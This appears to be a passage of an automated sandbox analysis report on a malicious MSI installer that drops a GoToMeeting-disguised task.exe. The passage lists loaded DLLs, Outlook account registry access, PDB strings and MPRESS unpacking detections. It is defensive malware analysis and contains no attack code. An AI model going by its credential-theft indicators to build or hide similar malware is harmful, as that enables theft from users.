                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeSection loaded: dpx.dllJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeSection loaded: wdscore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: g2m.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ndfapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wdi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: g2m.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\task.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\task.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\task.exeSection loaded: wldp.dll
                  Source: C:\Users\user\task.exeSection loaded: pstorec.dll
                  Source: C:\Users\user\task.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\task.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\task.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\task.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\task.exeSection loaded: wldp.dll
                  Source: C:\Users\user\task.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\task.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\task.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\task.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\task.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Users\user\task.exeSection loaded: g2m.dll
                  Source: C:\Users\user\task.exeSection loaded: winmm.dll
                  Source: C:\Users\user\task.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\task.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\task.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\task.exeSection loaded: netutils.dll
                  Source: C:\Users\user\task.exeSection loaded: wininet.dll
                  Source: C:\Users\user\task.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\task.exeSection loaded: rstrtmgr.dll
                  Source: C:\Users\user\task.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\task.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\task.exeSection loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: cryptbase.dll
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: mswsock.dll
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\dllhost.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile written: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\msiwrapper.iniJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: wE1inOhJA5.msiStatic file information: File size 1753088 > 1048576
                  Source: Binary string: your_package_name.pdbG source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp, task.exe, 00000008.00000003.1472143930.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp, task.exe, 0000001E.00000002.4491311882.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: wkernel32.pdb source: task.exe, 00000019.00000003.1667788844.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1667935272.0000000002C70000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676696250.0000000005550000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676535563.0000000005430000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1572618363.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wkernelbase.pdb source: task.exe, 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1668306416.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677021053.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: task.exe, 00000019.00000003.1664725236.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1665323555.0000000002D40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675135210.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675381954.0000000005620000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: your_package_name.pdbI source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: task.exe, 00000019.00000003.1665989629.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1666587570.0000000002CF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675802717.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676138788.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: task.exe, 00000019.00000003.1664725236.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1665323555.0000000002D40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675135210.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675381954.0000000005620000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: task.exe, 00000019.00000003.1665989629.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1666587570.0000000002CF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675802717.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676138788.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\<.oeaccount source: task.exe, 0000001A.00000002.1666589979.000000000061C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: your_package_name.pdb source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp, task.exe, 00000008.00000003.1472143930.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp, task.exe, 0000001E.00000002.4491311882.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: wkernelbase.pdbUGP source: task.exe, 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1668306416.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677021053.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wkernel32.pdbUGP source: task.exe, 00000019.00000003.1667788844.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1667935272.0000000002C70000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676696250.0000000005550000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676535563.0000000005430000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: expand.exe, 00000006.00000003.1433042313.000000000482F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1572618363.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000008.00000002.1571419937.0000000000402000.00000002.00000001.01000000.00000005.sdmp, task.exe, 00000008.00000000.1439408986.0000000000402000.00000002.00000001.01000000.00000005.sdmp, task.exe, 00000016.00000000.1579511832.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 00000016.00000002.4486274195.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 00000018.00000000.1650674244.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 00000019.00000002.1675825905.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 0000001A.00000000.1651000866.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 0000001B.00000000.1652070836.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 0000001E.00000002.4486356902.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, task.exe, 0000001E.00000000.1662738715.0000000000402000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.* source: task.exe, 0000001A.00000002.1666589979.0000000000608000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\task.exeUnpacked PE file: 24.2.task.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.CRT:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: C:\Users\user\task.exeUnpacked PE file: 26.2.task.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.CRT:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: C:\Users\user\task.exeUnpacked PE file: 27.2.task.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.CRT:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  .NET source code contains potential unpacker
                  Source: 32.3.svchost.exe.1be856bc070.1.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                  Source: 32.3.svchost.exe.1be856bc070.1.raw.unpack, Runtime.cs.Net Code: CoreMain
                  Source: 32.3.svchost.exe.1be856bc070.0.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                  Source: 32.3.svchost.exe.1be856bc070.0.raw.unpack, Runtime.cs.Net Code: CoreMain
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DB840 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex,8_2_6C8DB840
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8C8720 push eax; mov dword ptr [esp], 00000007h8_2_6C8C8721
